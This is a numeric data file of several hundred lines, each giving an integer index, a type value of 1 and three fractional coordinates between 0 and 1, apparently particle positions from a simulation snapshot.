1453 1 0.0427188 0.805419 0.792582
1588 1 0.10571 0.848462 0.795782
941 1 0.0623577 0.961053 0.862781
522 1 0.479967 0.955084 0.756425
615 1 0.181885 0.999697 0.760917
579 1 0.498505 0.644805 0.976491
1822 1 0.433793 0.0938602 0.768641
483 1 0.222192 0.178171 0.818413
590 1 0.421968 0.15581 0.843893
1102 1 0.219214 0.216979 0.847761
1122 1 0.0703256 0.155692 0.838209
1507 1 0.256963 0.220467 0.851437
250 1 0.0879163 0.283028 0.890794
1332 1 0.188529 0.33439 0.798887
958 1 0.224983 0.221385 0.859189
552 1 0.269762 0.343177 0.849974
894 1 0.384916 0.407017 0.845523
2004 1 0.348841 0.427078 0.774751
1724 1 0.26411 0.517405 0.813714
1711 1 0.202618 0.525558 0.836281
608 1 0.157539 0.58327 0.778495
331 1 0.0363993 0.706016 0.767593
470 1 0.313155 0.761912 0.788826
1928 1 0.241926 0.825712 0.886856
1729 1 0.438814 0.879455 0.844177
4 1 0.356026 0.0196809 0.830791
1159 1 0.445086 0.0292231 0.847421
230 1 0.379024 0.108365 0.864351
234 1 0.456748 0.126013 0.851197
1561 1 0.301978 0.127034 0.841729
2014 1 0.0821132 0.165122 0.845745
1977 1 0.21892 0.145864 0.857874
1214 1 0.425463 0.310348 0.88479
95 1 0.355448 0.208952 0.894541
462 1 0.28287 0.364495 0.854337
447 1 0.356336 0.37828 0.86608
1368 1 0.181475 0.430466 0.936537
1026 1 0.284213 0.54116 0.776698
765 1 0.40506 0.600155 0.853179
500 1 0.189004 0.586983 0.862813
374 1 0.378117 0.667625 0.835578
1188 1 0.099523 0.624863 0.884111
1180 1 0.214952 0.608235 0.836053
1895 1 0.0231202 0.164946 0.898933
257 1 0.249485 0.745982 0.852551
1865 1 0.267394 0.907567 0.907505
451 1 0.0968374 0.850385 0.8084
1517 1 0.43396 0.888451 0.887913
712 1 0.0431944 0.967324 0.851031
525 1 0.093075 0.00401931 0.818374
1112 1 0.256214 0.942625 0.82049
1294 1 0.0574309 0.0766542 0.859345
211 1 0.408586 0.111894 0.927862
267 1 0.448621 0.120691 0.855598
1139 1 0.184846 0.294487 0.837774
1271 1 0.480563 0.708802 0.595601
1828 1 0.229881 0.471651 0.825538
663 1 0.226186 0.599806 0.855617
1846 1 0.161136 0.660703 0.897319
1646 1 0.12915 0.629663 0.855422
695 1 0.273809 0.602239 0.857055
1586 1 0.367709 0.645508 0.889914
554 1 0.0503578 0.655337 0.907723
1800 1 0.13563 0.696174 0.806659
271 1 0.20051 0.765352 0.871839
1676 1 0.430803 0.846304 0.953763
168 1 0.108214 0.898391 0.874442
536 1 0.132568 0.911797 0.79182
1269 1 0.443634 0.799202 0.832916
490 1 0.371365 0.870593 0.824491
117 1 0.112284 0.8811 0.875242
1085 1 0.324568 0.907427 0.858809
1864 1 0.396868 0.117921 0.896645
1284 1 0.170714 0.143372 0.921807
1579 1 0.150447 0.208081 0.916983
2034 1 0.360732 0.172076 0.888904
721 1 0.122417 0.261609 0.876805
840 1 0.266364 0.555312 0.82346
1697 1 0.233885 0.636548 0.986414
463 1 0.114514 0.717497 0.847384
1998 1 0.0184401 0.73796 0.912988
955 1 0.377375 0.722736 0.942505
694 1 0.286938 0.775036 0.892814
1445 1 0.465554 0.983376 0.924371
1190 1 0.49499 0.0869185 0.991635
1484 1 0.425768 0.176288 0.879554
1380 1 0.0826805 0.23729 0.924641
1614 1 0.182277 0.263279 0.896588
497 1 0.170363 0.243225 0.982125
1485 1 0.260893 0.249416 0.907016
147 1 0.0182284 0.333161 0.829597
454 1 0.024606 0.318917 0.890578
449 1 0.111848 0.482632 0.931375
836 1 0.164517 0.634687 0.882711
200 1 0.0824721 0.729881 0.906272
1644 1 0.48812 0.0135437 0.501083
220 1 0.44908 0.772602 0.825345
1764 1 0.138498 0.921525 0.948359
802 1 0.406813 0.81862 0.835894
24 1 0.463736 0.855212 0.863881
728 1 0.287029 0.885196 0.979408
1025 1 0.421771 0.918097 0.888067
341 1 0.0458398 0.023043 0.914149
201 1 0.129785 0.0635084 0.946484
973 1 0.00453342 0.0820409 0.912785
249 1 0.285397 0.0724056 0.895219
437 1 0.0173217 0.256292 0.947631
572 1 0.447968 0.187815 0.924963
791 1 0.341108 0.215608 0.848134
1121 1 0.0731864 0.245087 0.956057
1803 1 0.273728 0.282869 0.953956
1827 1 0.428266 0.528409 0.899082
311 1 0.419391 0.590358 0.929938
1078 1 0.430203 0.660003 0.890406
475 1 0.466111 0.818963 0.896616
647 1 0.405632 0.844426 0.950129
1320 1 0.188453 0.977072 0.97494
1455 1 0.0462681 0.111863 0.983005
871 1 0.230506 0.225812 0.931061
203 1 0.17815 0.343281 0.943171
1275 1 0.0993289 0.347775 0.920416
3 1 0.0384203 0.366062 0.958986
933 1 0.0610227 0.315512 0.949626
179 1 0.0270515 0.44578 0.890296
153 1 0.422722 0.614129 0.948761
1412 1 0.165803 0.6368 0.941763
957 1 0.238767 0.741496 0.950072
1227 1 0.0649406 0.844138 0.934733
1823 1 0.264818 0.813743 0.899511
1996 1 0.347003 0.907922 0.954539
1600 1 0.452773 0.855373 0.982825
1414 1 0.188078 0.993976 0.937361
1673 1 0.294955 0.00174908 0.978573
1081 1 0.289152 0.104934 0.974774
74 1 0.321965 0.143062 0.898454
1908 1 0.0704565 0.134262 0.993753
1205 1 0.247201 0.154539 0.992449
726 1 0.483357 0.209726 0.915
1066 1 0.0948716 0.243661 0.965172
1178 1 0.186262 0.373322 0.980835
629 1 0.342046 0.421843 0.918598
1446 1 0.0362863 0.512026 0.999458
591 1 0.21265 0.502119 0.961035
1430 1 0.451086 0.469691 0.955876
355 1 0.380382 0.502523 0.91301
138 1 0.135599 0.538169 0.977355
1466 1 0.208806 0.583584 0.982899
1170 1 0.35474 0.598949 0.970173
771 1 0.12076 0.626588 0.901191
1295 1 0.425744 0.672805 0.937014
1279 1 0.200149 0.741648 0.965424
1509 1 0.214927 0.865613 0.975682
1523 1 0.337897 0.863645 0.964143
753 1 0.0933359 0.88213 0.970265
294 1 0.459377 0.927928 0.912931
1351 1 0.0397963 0.940025 0.972128
1489 1 0.0270484 0.102886 0.978516
1796 1 0.133855 0.309052 0.52236
83 1 0.482094 0.448453 0.800121
1572 1 0.328068 0.289106 0.984445
1894 1 0.465688 0.55307 0.994278
757 1 0.411301 0.329962 0.954438
995 1 0.197231 0.202367 0.515886
860 1 0.0302582 0.491267 0.950418
1109 1 0.220971 0.565555 0.949923
557 1 0.412595 0.587718 0.999895
792 1 0.143287 0.647853 0.879147
717 1 0.313306 0.632096 0.958489
1428 1 0.478804 0.702797 0.810288
1690 1 0.0750982 0.702038 0.967591
655 1 0.476135 0.615435 0.811931
1164 1 0.203611 0.713439 0.951568
1443 1 0.391704 0.701889 0.982756
830 1 0.426138 0.204546 0.573787
1917 1 0.218418 0.961268 0.98126
1560 1 0.0207443 0.0488822 0.883323
193 1 0.278229 0.950151 0.970187
542 1 0.112572 0.993975 0.93398
1002 1 0.271869 0.27002 0.514514
1399 1 0.0127886 0.495203 0.772405
1237 1 0.31149 0.110101 0.560416
569 1 0.0978785 0.366254 0.969596
190 1 0.466901 0.0956182 0.686854
1359 1 0.227774 0.998764 0.957962
793 1 0.0728785 0.840408 0.536791
233 1 0.134595 0.779549 0.555356
304 1 0.291556 0.642158 0.97528
1349 1 0.29047 0.688369 0.97017
503 1 0.387863 0.879941 0.522576
333 1 0.441571 0.780344 0.993966
353 1 0.234912 0.647467 0.996005
1667 1 0.171067 0.585907 0.952926
1927 1 0.227715 0.951207 0.515356
1569 1 0.227469 0.640648 0.577788
1832 1 0.0257572 0.0224933 0.988704
891 1 0.007808 0.699312 0.734782
705 1 0.129314 0.699057 0.986664
1435 1 0.489698 0.143305 0.510331
1970 1 0.000980483 0.126889 0.611947
1490 1 0.49802 0.819789 0.625328
970 1 0.498516 0.0970357 0.698386
72 1 0.299174 0.91463 0.502339
157 1 0.260243 0.553094 0.999044
260 1 0.323804 0.426528 0.999924
1495 1 0.565674 0.61608 0.0171529
1307 1 0.976099 0.681517 0.462363
942 1 0.892182 0.20467 0.00796108
851 1 0.811603 0.168898 0.0305026
1670 1 0.855321 0.241241 0.0636653
1585 1 0.507193 0.539491 0.339887
499 1 0.986352 0.43161 0.0317778
1089 1 0.567609 0.782662 0.342656
1156 1 0.905462 0.671266 0.0572332
1082 1 0.796503 0.404976 0.0195527
699 1 0.536048 0.485729 0.0583635
1875 1 0.956628 0.937991 0.0160726
1746 1 0.618728 0.981971 0.0675391
1520 1 0.98383 0.358016 0.492781
1257 1 0.549379 0.0874081 0.0651361
1131 1 0.65983 0.943011 0.0219159
383 1 0.790117 0.799782 0.49191
861 1 0.813771 0.14536 0.0366739
1506 1 0.863663 0.197543 0.0970028
1750 1 0.60691 0.448198 0.0280334
480 1 0.772577 0.220977 0.102528
1956 1 0.777326 0.295063 0.0975222
1529 1 0.506337 0.733688 0.315255
1202 1 0.621482 0.347945 0.00710232
1319 1 0.568455 0.827502 0.348222
1367 1 0.979833 0.11601 0.234718
290 1 0.833509 0.624774 0.0560129
974 1 0.929983 0.620018 0.0720764
1919 1 0.715741 0.788002 0.026055
1639 1 0.666276 0.801658 0.0323616
679 1 0.509923 0.0546347 0.122709
711 1 0.882536 0.888581 0.0533114
1874 1 0.932002 0.899749 0.0240172
1013 1 0.957036 0.994053 0.00827783
605 1 0.605294 0.0382728 0.0739511
1141 1 0.657361 0.140114 0.0155398
910 1 0.682683 0.315645 0.0378709
84 1 0.580204 0.438717 0.119437
956 1 0.74677 0.443212 0.0681139
97 1 0.805499 0.36072 0.115803
1566 1 0.530253 0.43247 0.474927
1462 1 0.96144 0.818102 0.353211
431 1 0.961596 0.674932 0.0450191
718 1 0.511232 0.713293 0.0697533
457 1 0.901475 0.757176 0.0150928
1247 1 0.654532 0.703861 0.103743
284 1 0.540221 0.821894 0.109352
1760 1 0.901224 0.938481 0.0495
1583 1 0.663615 0.0816901 0.0741413
121 1 0.537542 0.22412 0.00392897
1127 1 0.703804 0.224661 0.0771876
1813 1 0.656225 0.30124 0.0655726
1650 1 0.778383 0.277901 0.0622316
570 1 0.947266 0.339446 0.110147
740 1 0.626608 0.283139 0.0266692
261 1 0.966636 0.325853 0.116709
1433 1 0.913478 0.349147 0.0579871
1737 1 0.713366 0.367317 0.0748442
1425 1 0.644836 0.391683 0.0295002
1612 1 0.937834 0.420691 0.08249
448 1 0.925432 0.416698 0.0937215
576 1 0.765634 0.440327 0.0865511
1745 1 0.549303 0.637984 0.0671927
1426 1 0.537224 0.614356 0.0739651
226 1 0.801064 0.819281 0.120936
916 1 0.527662 0.84991 0.020519
1224 1 0.879125 0.0314856 0.0724248
767 1 0.623021 0.0382277 0.0382246
1686 1 0.671566 0.272807 0.0829667
672 1 0.74232 0.271023 0.0443162
1090 1 0.853589 0.269312 0.0893587
943 1 0.524018 0.3322 0.0732468
1329 1 0.680389 0.406671 0.0879606
1369 1 0.999605 0.459137 0.0820354
1169 1 0.743143 0.415024 0.071003
2033 1 0.553469 0.141642 0.441588
181 1 0.648799 0.638406 0.0790799
1950 1 0.551538 0.818232 0.0363811
1177 1 0.617251 0.787015 0.0986789
508 1 0.596716 0.807144 0.0642161
1006 1 0.721951 0.817221 0.0116499
610 1 0.555549 0.775873 0.0562259
322 1 0.589821 0.838336 0.0759234
837 1 0.827388 0.819683 0.120128
1599 1 0.50202 0.355147 0.295156
272 1 0.59739 0.962581 0.0676062
2025 1 0.811679 0.0246295 0.0996168
954 1 0.827856 0.059508 0.0873211
1965 1 0.819973 0.120884 0.10662
413 1 0.87415 0.0800487 0.0657678
900 1 0.589414 0.121313 0.164778
1988 1 0.932264 0.245222 0.0769315
515 1 0.945874 0.169072 0.100112
1256 1 0.696877 0.279984 0.105561
1940 1 0.881226 0.402047 0.0570738
1181 1 0.91766 0.463235 0.104846
1773 1 0.56468 0.504379 0.108265
879 1 0.746137 0.494758 0.104131
834 1 0.810827 0.684094 0.108493
534 1 0.644453 0.655638 0.0385744
876 1 0.725825 0.712153 0.126845
27 1 0.750747 0.768174 0.0602768
2016 1 0.7715 0.858692 0.0445574
769 1 0.768146 0.878751 0.109425
887 1 0.637083 0.875035 0.0451988
400 1 0.956876 0.953464 0.0663119
33 1 0.978464 0.877093 0.139219
1622 1 0.677527 0.899404 0.0741306
831 1 0.619454 0.0149487 0.111104
1883 1 0.90414 0.0603879 0.143898
1709 1 0.716836 0.181115 0.0920545
238 1 0.872616 0.188114 0.145638
1816 1 0.716549 0.21347 0.148883
275 1 0.701377 0.328718 0.13239
1096 1 0.569612 0.387873 0.158822
1043 1 0.661706 0.347037 0.128345
62 1 0.625178 0.472419 0.120483
909 1 0.656246 0.443242 0.149434
276 1 0.559034 0.39233 0.0730233
1962 1 0.618754 0.417807 0.0990597
159 1 0.754382 0.524936 0.136168
1969 1 0.978345 0.760942 0.210587
395 1 0.605385 0.533593 0.163683
299 1 0.571684 0.503822 0.121644
2032 1 0.92596 0.48857 0.108974
566 1 0.87817 0.671594 0.136853
652 1 0.660039 0.888655 0.111676
1088 1 0.702302 0.891855 0.102092
1120 1 0.738821 0.960358 0.106231
1018 1 0.50576 0.00701547 0.180976
863 1 0.511942 0.0565912 0.07155
1124 1 0.560779 0.0348071 0.117859
1403 1 0.624612 0.0824853 0.173979
725 1 0.857076 0.133723 0.176665
1809 1 0.556214 0.168774 0.0961129
105 1 0.796174 0.129725 0.176765
1031 1 0.521733 0.0173532 0.493961
68 1 0.594002 0.568255 0.0889067
1252 1 0.774412 0.572584 0.215482
1230 1 0.640537 0.577698 0.18278
1437 1 0.696218 0.647355 0.103406
947 1 0.962912 0.673729 0.122232
489 1 0.862894 0.743139 0.115549
99 1 0.500002 0.718645 0.131204
1008 1 0.581742 0.749689 0.165875
1097 1 0.896615 0.894255 0.0820542
1447 1 0.505052 0.0655828 0.0694447
2037 1 0.957881 0.949021 0.463033
1542 1 0.613584 0.171728 0.119768
784 1 0.615308 0.206284 0.17773
1301 1 0.847298 0.19768 0.147994
343 1 0.744355 0.195885 0.0571676
1215 1 0.659286 0.20851 0.125013
1059 1 0.658411 0.249138 0.118588
617 1 0.739593 0.195655 0.151957
89 1 0.941444 0.261452 0.168747
1092 1 0.747955 0.271558 0.167097
853 1 0.979354 0.375835 0.116386
145 1 0.781665 0.399382 0.267135
882 1 0.940523 0.536708 0.131994
167 1 0.846111 0.586576 0.218771
777 1 0.6011 0.702121 0.200134
1641 1 0.618316 0.813691 0.111427
1841 1 0.663951 0.891464 0.229276
1688 1 0.977367 0.830942 0.127565
749 1 0.954841 0.195244 0.0936713
96 1 0.868854 0.997423 0.156077
1056 1 0.836332 0.944374 0.145587
1299 1 0.920763 0.117668 0.171248
1268 1 0.87526 0.184274 0.12653
385 1 0.823111 0.25169 0.205075
1468 1 0.838994 0.265495 0.13915
1259 1 0.943957 0.338785 0.215399
415 1 0.865581 0.379444 0.171786
1900 1 0.611564 0.472367 0.180268
134 1 0.989923 0.523155 0.0637279
459 1 0.914084 0.556979 0.19462
58 1 0.684628 0.505936 0.0384363
1331 1 0.800127 0.677729 0.253634
797 1 0.573996 0.770715 0.192428
210 1 0.680059 0.754206 0.18506
1930 1 0.57769 0.856456 0.241653
466 1 0.72736 0.722352 0.135438
485 1 0.734843 0.963024 0.162908
1167 1 0.824007 0.92994 0.151346
528 1 0.734205 0.061131 0.227352
654 1 0.955908 0.0259682 0.130243
1486 1 0.816519 0.159322 0.176992
1779 1 0.811805 0.172714 0.210562
1992 1 0.650771 0.278904 0.152539
1633 1 0.967206 0.362053 0.152136
1732 1 0.663946 0.450832 0.168708
597 1 0.872034 0.404706 0.184945
1246 1 0.917576 0.533369 0.192229
1373 1 0.896938 0.45586 0.221639
758 1 0.814414 0.497406 0.237305
1128 1 0.528777 0.512076 0.168363
1696 1 0.810974 0.734978 0.17451
445 1 0.884943 0.675163 0.181587
903 1 0.885373 0.749432 0.169025
929 1 0.873994 0.942832 0.189662
6 1 0.709295 0.0927013 0.229585
406 1 0.952054 0.0311431 0.196775
237 1 0.590319 0.0532375 0.171873
533 1 0.703228 0.0757332 0.199807
555 1 0.96562 0.119711 0.227727
1264 1 0.510242 0.199368 0.184096
2030 1 0.843239 0.0904281 0.173712
1564 1 0.555468 0.33218 0.2425
1627 1 0.588046 0.490732 0.208307
997 1 0.74235 0.823646 0.221932
1720 1 0.725406 0.847662 0.212071
376 1 0.584882 0.863784 0.185908
1242 1 0.601744 0.998001 0.174396
1375 1 0.505399 0.0653035 0.273609
1995 1 0.834657 0.0401129 0.2464
1106 1 0.934276 0.094092 0.311613
49 1 0.935224 0.326173 0.490634
127 1 0.775656 0.377789 0.249838
1884 1 0.936783 0.62256 0.415303
1313 1 0.636231 0.387252 0.224448
5 1 0.76153 0.412158 0.270558
1261 1 0.965167 0.414189 0.253829
1385 1 0.819877 0.527666 0.25326
1353 1 0.783108 0.671241 0.243656
101 1 0.893829 0.652246 0.182358
297 1 0.901062 0.620693 0.167484
602 1 0.842891 0.6599 0.260406
1812 1 0.74468 0.764885 0.242224
960 1 0.567361 0.769957 0.214253
1914 1 0.577274 0.831691 0.194485
1831 1 0.924655 0.807991 0.278486
574 1 0.846566 0.0418445 0.284475
154 1 0.986776 0.198144 0.255635
611 1 0.755632 0.315389 0.203423
1501 1 0.552918 0.303429 0.226888
1978 1 0.774574 0.33365 0.189076
1396 1 0.535475 0.660746 0.00775132
1825 1 0.761365 0.428075 0.238845
26 1 0.864036 0.486635 0.207501
1191 1 0.733561 0.528363 0.255059
1765 1 0.570544 0.637297 0.272536
778 1 0.68041 0.67265 0.238165
2023 1 0.885999 0.770416 0.172607
1195 1 0.939884 0.796607 0.294353
214 1 0.898684 0.808855 0.283725
1478 1 0.881732 0.900437 0.228742
1932 1 0.717476 0.934794 0.244702
1325 1 0.709661 0.950158 0.192021
163 1 0.784518 0.207054 0.301586
241 1 0.716544 0.244724 0.268582
150 1 0.760127 0.327375 0.314861
1582 1 0.824052 0.375328 0.266244
91 1 0.756199 0.412541 0.210881
1725 1 0.629566 0.516095 0.279363
479 1 0.666444 0.456482 0.254892
1775 1 0.615064 0.503242 0.246344
1556 1 0.551034 0.589971 0.19685
308 1 0.79597 0.505545 0.227801
263 1 0.938853 0.592175 0.251067
1305 1 0.645995 0.705852 0.239307
59 1 0.632303 0.762305 0.239164
1856 1 0.857108 0.730812 0.254583
390 1 0.898602 0.841587 0.315492
2009 1 0.528459 0.885353 0.309699
662 1 0.714585 0.898455 0.254962
460 1 0.810425 0.903057 0.211718
1498 1 0.905507 0.884131 0.248818
760 1 0.707914 0.0187676 0.243721
424 1 0.923888 0.0202751 0.276234
1158 1 0.9253 0.0332752 0.256148
1689 1 0.595117 0.059764 0.239473
456 1 0.805687 0.236369 0.286362
1850 1 0.844693 0.201721 0.246378
883 1 0.684548 0.234379 0.233243
691 1 0.641256 0.362519 0.288217
1999 1 0.740825 0.425857 0.2499
1889 1 0.899099 0.295759 0.283425
1432 1 0.530574 0.425094 0.272526
1525 1 0.609082 0.322625 0.315872
1311 1 0.693208 0.400072 0.297631
421 1 0.683934 0.372407 0.229123
140 1 0.737922 0.379538 0.312663
980 1 0.688219 0.558272 0.286852
1337 1 0.553687 0.583327 0.312082
1333 1 0.818126 0.666228 0.274157
755 1 0.956928 0.640062 0.232865
1852 1 0.71501 0.735859 0.321596
1151 1 0.815471 0.786382 0.307543
1229 1 0.620075 0.890117 0.240836
366 1 0.697251 0.943297 0.291203
20 1 0.7814 0.982101 0.247112
39 1 0.553678 0.0960985 0.358217
759 1 0.672984 0.125679 0.313796
291 1 0.729596 0.115349 0.287697
93 1 0.808958 0.173775 0.264073
1286 1 0.88155 0.208546 0.247587
476 1 0.637704 0.281239 0.256779
1285 1 0.543368 0.369432 0.028111
616 1 0.94543 0.361768 0.288057
1521 1 0.854087 0.426428 0.310713
707 1 0.711042 0.522913 0.356982
481 1 0.707879 0.567166 0.289377
1449 1 0.53549 0.658108 0.325287
1878 1 0.927496 0.646797 0.263252
1657 1 0.757078 0.649373 0.217291
370 1 0.582797 0.758401 0.287412
715 1 0.955266 0.749079 0.322421
175 1 0.758151 0.801599 0.219238
235 1 0.730663 0.855188 0.35034
1502 1 0.733695 0.861018 0.260496
1758 1 0.923628 0.93239 0.312422
289 1 0.756782 0.515349 0.0281975
832 1 0.512174 0.974743 0.289445
1993 1 0.652694 0.965069 0.229538
392 1 0.536801 0.0286337 0.255945
1461 1 0.718304 0.0400988 0.3671
69 1 0.518461 0.451058 0.0103074
1450 1 0.508839 0.609248 0.399456
1020 1 0.685698 0.189969 0.306205
387 1 0.742776 0.216953 0.290705
560 1 0.912177 0.302615 0.343125
813 1 0.981045 0.444419 0.153899
1297 1 0.828916 0.422227 0.2977
1238 1 0.606827 0.375784 0.283464
1744 1 0.521244 0.466292 0.299754
1712 1 0.876606 0.501039 0.324113
369 1 0.969283 0.544508 0.344298
396 1 0.829473 0.643685 0.31576
160 1 0.737621 0.676842 0.333948
321 1 0.811873 0.668143 0.337189
1080 1 0.913026 0.900871 0.350268
189 1 0.636773 0.175271 0.35249
722 1 0.600782 0.139904 0.275535
1810 1 0.762259 0.190414 0.335894
1987 1 0.578358 0.24029 0.314411
1663 1 0.742819 0.26598 0.327571
637 1 0.827709 0.276371 0.33069
634 1 0.933269 0.287042 0.313357
1682 1 0.975837 0.493948 0.470996
1971 1 0.879279 0.396446 0.28485
1197 1 0.854979 0.443371 0.354439
254 1 0.713553 0.47093 0.341392
287 1 0.991059 0.460574 0.408193
1815 1 0.81976 0.510946 0.291493
34 1 0.876841 0.405027 0.356058
1594 1 0.946924 0.4301 0.332295
243 1 0.795628 0.573559 0.371575
825 1 0.574017 0.544154 0.328328
1245 1 0.813877 0.63648 0.373417
362 1 0.882376 0.600988 0.301286
1101 1 0.842684 0.754278 0.319529
356 1 0.62841 0.684568 0.272681
1347 1 0.753389 0.947964 0.227536
1148 1 0.615929 0.975867 0.269768
985 1 0.664528 0.987689 0.382997
488 1 0.734579 0.0926505 0.209779
1212 1 0.571009 0.0275047 0.391185
496 1 0.888131 0.205186 0.281586
1067 1 0.883783 0.30152 0.32541
1824 1 0.863823 0.249269 0.339946
1476 1 0.642547 0.302734 0.352129
302 1 0.827353 0.362532 0.387848
1442 1 0.842809 0.431765 0.370012
1766 1 0.811201 0.40876 0.364548
1077 1 0.930249 0.508971 0.351102
658 1 0.845558 0.55224 0.369673
1234 1 0.702081 0.505071 0.377066
1339 1 0.651061 0.621849 0.397568
1718 1 0.55937 0.665582 0.343353
826 1 0.715589 0.775554 0.375849
774 1 0.903083 0.784094 0.317999
1348 1 0.930078 0.0326537 0.379176
2 1 0.801699 0.85731 0.397953
256 1 0.681106 0.922305 0.386611
1531 1 0.660355 0.100256 0.392706
1392 1 0.947479 0.17149 0.336737
323 1 0.996982 0.102801 0.378203
893 1 0.882966 0.114825 0.314679
1618 1 0.806538 0.296979 0.360583
993 1 0.62661 0.415403 0.389053
217 1 0.752192 0.392367 0.363244
1292 1 0.90969 0.423813 0.33949
1218 1 0.63875 0.588688 0.404266
472 1 0.576957 0.702607 0.430014
1595 1 0.635296 0.696898 0.325305
184 1 0.878602 0.639476 0.376154
1851 1 0.915236 0.695327 0.394865
785 1 0.888887 0.757085 0.381773
129 1 0.860976 0.778924 0.00993794
1161 1 0.619648 0.778149 0.365052
938 1 0.877202 0.749461 0.363555
1953 1 0.665238 0.795879 0.348347
1110 1 0.944206 0.762949 0.348008
967 1 0.741622 0.843357 0.364318
619 1 0.916356 0.979851 0.399277
1354 1 0.910664 0.946925 0.369204
1896 1 0.696557 0.974672 0.41373
1228 1 0.958069 0.955941 0.360015
1869 1 0.71362 0.342207 0.495877
1913 1 0.630292 0.213611 0.420609
1321 1 0.804841 0.191484 0.349063
822 1 0.804169 0.318907 0.334506
51 1 0.896599 0.446505 0.409947
651 1 0.679266 0.556146 0.437931
1322 1 0.517888 0.578423 0.368003
259 1 0.591297 0.506647 0.354232
1647 1 0.862995 0.60251 0.327529
86 1 0.903917 0.658806 0.406712
1514 1 0.726346 0.703599 0.437732
161 1 0.954827 0.946132 0.362274
1220 1 0.906188 0.130489 0.426158
930 1 0.615819 0.277883 0.41339
1819 1 0.524343 0.350174 0.378847
417 1 0.874994 0.276435 0.414281
1899 1 0.755062 0.337344 0.421685
1922 1 0.79084 0.334498 0.4496
1551 1 0.988362 0.613563 0.366449
149 1 0.947 0.367447 0.394349
626 1 0.909797 0.484162 0.460736
277 1 0.732283 0.481739 0.38933
482 1 0.796592 0.519678 0.345696
332 1 0.987305 0.611352 0.458446
671 1 0.617304 0.66206 0.359544
236 1 0.590599 0.703537 0.429446
1472 1 0.987241 0.69695 0.419953
1893 1 0.781213 0.79595 0.387414
347 1 0.551886 0.908418 0.0616304
1664 1 0.956496 0.945412 0.40235
1411 1 0.605993 0.89347 0.440527
1536 1 0.51003 0.0603461 0.404457
928 1 0.714329 0.115304 0.442593
562 1 0.666712 0.0929282 0.429068
1467 1 0.79509 0.300987 0.482834
708 1 0.718433 0.179594 0.435679
984 1 0.917389 0.138065 0.416537
2002 1 0.661851 0.226308 0.439288
1951 1 0.920877 0.296289 0.408189
1384 1 0.839502 0.357139 0.395484
1842 1 0.842297 0.431642 0.441424
1580 1 0.805801 0.513074 0.419203
13 1 0.592548 0.580932 0.407916
1741 1 0.707358 0.58905 0.417935
1571 1 0.725277 0.526647 0.45804
713 1 0.579052 0.660977 0.493987
169 1 0.791619 0.72208 0.454248
1083 1 0.938803 0.803833 0.444814
1740 1 0.989603 0.0950404 0.421453
537 1 0.541338 0.899141 0.356814
116 1 0.709613 0.88747 0.450611
498 1 0.829221 0.879595 0.347917
216 1 0.6412 0.00602426 0.425159
379 1 0.728717 0.94134 0.405956
1035 1 0.678331 0.0748426 0.423351
675 1 0.834935 0.997024 0.417876
1786 1 0.547597 0.124985 0.411963
1046 1 0.877327 0.25374 0.471195
511 1 0.773696 0.342735 0.475196
807 1 0.702625 0.390208 0.437392
422 1 0.837711 0.486346 0.387383
2028 1 0.888759 0.498789 0.482394
526 1 0.506456 0.997529 0.387282
100 1 0.906912 0.601115 0.435475
790 1 0.749485 0.643506 0.404971
122 1 0.7612 0.764844 0.438048
889 1 0.719899 0.928808 0.479887
977 1 0.960173 0.91051 0.437177
583 1 0.897811 0.0354358 0.45959
1204 1 0.861142 0.939095 0.42863
1592 1 0.636923 0.0629669 0.477546
1570 1 0.588992 0.130043 0.430987
1776 1 0.647772 0.230231 0.469252
1039 1 0.840109 0.603677 0.362749
548 1 0.776025 0.884196 0.450465
754 1 0.80715 0.315752 0.418451
433 1 0.548875 0.481826 0.399336
1173 1 0.97598 0.800303 0.39855
1733 1 0.503853 0.908084 0.203614
2017 1 0.798729 0.595193 0.476311
1249 1 0.93398 0.665867 0.414322
1853 1 0.702245 0.692592 0.438825
688 1 0.829004 0.702185 0.470264
1029 1 0.891086 0.73897 0.437763
244 1 0.861968 0.800256 0.488151
1424 1 0.824789 0.751852 0.471271
1058 1 0.58604 0.796646 0.432243
1855 1 0.923308 0.8873 0.472803
1098 1 0.721983 0.0251253 0.43559
87 1 0.855508 0.981998 0.46805
507 1 0.974345 0.692578 0.424629
1867 1 0.801256 0.115294 0.486348
1154 1 0.971244 0.996448 0.224404
782 1 0.784651 0.0906566 0.471183
1015 1 0.880817 0.161174 0.443648
2015 1 0.925735 0.0970969 0.498304
1645 1 0.55429 0.403729 0.493359
1904 1 0.517243 0.175749 0.040958
1050 1 0.961507 0.236257 0.465498
763 1 0.750683 0.423077 0.497258
1714 1 0.90104 0.906109 0.478766
1187 1 0.543001 0.677638 0.489754
1768 1 0.626073 0.664118 0.422617
266 1 0.948593 0.633349 0.450472
867 1 0.610396 0.688707 0.41677
352 1 0.937112 0.73898 0.46608
1065 1 0.522837 0.872279 0.0173061
1544 1 0.972866 0.232593 0.35384
1072 1 0.985163 0.808204 0.134191
1587 1 0.896636 0.00697165 0.511361
1578 1 0.800142 0.0234256 0.532073
1699 1 0.814104 0.145462 0.534231
446 1 0.7091 0.334146 0.518465
896 1 0.889533 0.336486 0.538513
601 1 0.741109 0.403816 0.520499
1986 1 0.536671 0.751299 0.92386
571 1 0.977426 0.525129 0.761486
764 1 0.971134 0.828992 0.940244
444 1 0.576583 0.660213 0.510719
71 1 0.787875 0.0263171 0.584316
982 1 0.524173 0.436864 0.845327
1543 1 0.949569 0.0652261 0.540216
394 1 0.506337 0.860529 0.65406
1634 1 0.694397 0.174484 0.550745
1797 1 0.799376 0.325702 0.992837
1877 1 0.825242 0.589499 0.56331
1111 1 0.84865 0.550624 0.541786
987 1 0.63473 0.539693 0.505316
1708 1 0.833948 0.566675 0.517066
1703 1 0.806308 0.827993 0.531222
1704 1 0.620748 0.860291 0.520144
398 1 0.514128 0.0565852 0.545562
1540 1 0.867865 0.958971 0.508165
693 1 0.69925 0.0627169 0.50839
969 1 0.958535 0.0364286 0.521064
1019 1 0.653381 0.052965 0.590679
1400 1 0.963912 0.0681558 0.587891
1839 1 0.969374 0.166541 0.556837
1881 1 0.698498 0.202392 0.512513
612 1 0.882461 0.21719 0.582159
1859 1 0.554314 0.276767 0.549482
1694 1 0.877569 0.219809 0.574947
17 1 0.761288 0.277815 0.564909
1379 1 0.501396 0.73368 0.808214
641 1 0.852496 0.456422 0.611471
1340 1 0.879051 0.560207 0.531263
1460 1 0.700278 0.560636 0.543724
242 1 0.575407 0.678019 0.555412
315 1 0.860496 0.695528 0.520405
218 1 0.985679 0.723757 0.575467
1947 1 0.50097 0.145446 0.84429
494 1 0.555951 0.867858 0.572687
1386 1 0.984194 0.222322 0.579863
493 1 0.807406 0.842456 0.588585
293 1 0.868169 0.161347 0.530307
